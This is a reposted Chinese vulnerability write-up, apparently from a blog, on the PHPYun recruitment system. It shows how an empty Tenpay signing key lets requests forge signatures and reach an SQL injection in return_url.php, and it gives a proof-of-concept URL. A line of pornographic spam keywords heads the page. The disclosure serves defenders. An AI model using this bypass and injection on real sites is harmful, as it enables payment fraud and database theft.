日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

php云人才系统漏洞,php云人才系统 注入漏洞

發布時間:2023/12/29 php 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 php云人才系统漏洞,php云人才系统 注入漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

### 簡要描述:

php云人才系統 注入漏洞

### 詳細說明:

php云人才系統 注入漏洞

tenpay的KEY沒有初始化

導致的注入漏洞!

```

/api/tenpay/return_url.php

require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");

require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php");

$db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']);

/* 密鑰 */

$key =$tenpay[sy_tenpaycode];

//密鑰沒有定義

=========

tenpay_data.php

/*

* Created on 2012

* Link for shyflc@qq.com

* This PHPYun.Rencai System Powered by PHPYun.com

*/

$tenpaydata=array("sy_weburl"=>"http://www.job.com","sy_tenpayid"=>"","sy_tenpaycode"=>"")//沒有定義KEY 所以是空~~

;

?>

=========

/* 創建支付應答對象 */

$resHandler = new PayResponseHandler();

$resHandler->setKey($key);//還是key沒有初始化~~

//判斷簽名

if($resHandler->isTenpaySign()) {//驗證過程

/**********************************3

function isTenpaySign() {

$cmdno = $this->getParameter("cmdno");

$pay_result = $this->getParameter("pay_result");

$date = $this->getParameter("date");

$transaction_id = $this->getParameter("transaction_id");

$sp_billno = $this->getParameter("sp_billno");

$total_fee = $this->getParameter("total_fee");

$fee_type = $this->getParameter("fee_type");

$attach = $this->getParameter("attach");

$key = $this->getKey();

$signPars = "";

//組織簽名串

$signPars = "cmdno=" . $cmdno . "&" .

"pay_result=" . $pay_result . "&" .

"date=" . $date . "&" .

"transaction_id=" . $transaction_id . "&" .

"sp_billno=" . $sp_billno . "&" .

"total_fee=" . $total_fee . "&" .

"fee_type=" . $fee_type . "&" .

"attach=" . $attach . "&" .

"key=" . $key;

$sign = strtolower(md5($signPars));//key是空 其他都是可控 我們之間就可以生成key 所以驗證形同虛設 沒有設置key的時候

***********************************/

//交易單號

$transaction_id = $resHandler->getParameter("transaction_id");

//本站單號

$sp_billno = $resHandler->getParameter("sp_billno");

//金額,以分為單位

$total_fee = $resHandler->getParameter("total_fee");

//支付結果

$pay_result = $resHandler->getParameter("pay_result");

//類型

$attach = $resHandler->getParameter("attach");

if( "0" == $pay_result ) {

//------------------------------

//處理業務開始

//------------------------------

//注意交易單不要重復處理

//注意判斷返回金額

//處理本站信息開始

echo "select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'";

$sql=$db->query("select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'");

$row=mysql_fetch_array($sql);

```

### 漏洞證明:

測試方法

http://127.0.0.1/yun3/api/tenpay/return_url.php?sign=ba7b763f604fb46432eac7fb601c55c1&sp_billno=1%27&pay_result=0

[](https://images.seebug.org/upload/201311/22174047d7b1300aa8b4cb2ab4c0ff13d0fe5f89.jpg)

總結

以上是生活随笔為你收集整理的php云人才系统漏洞,php云人才系统 注入漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。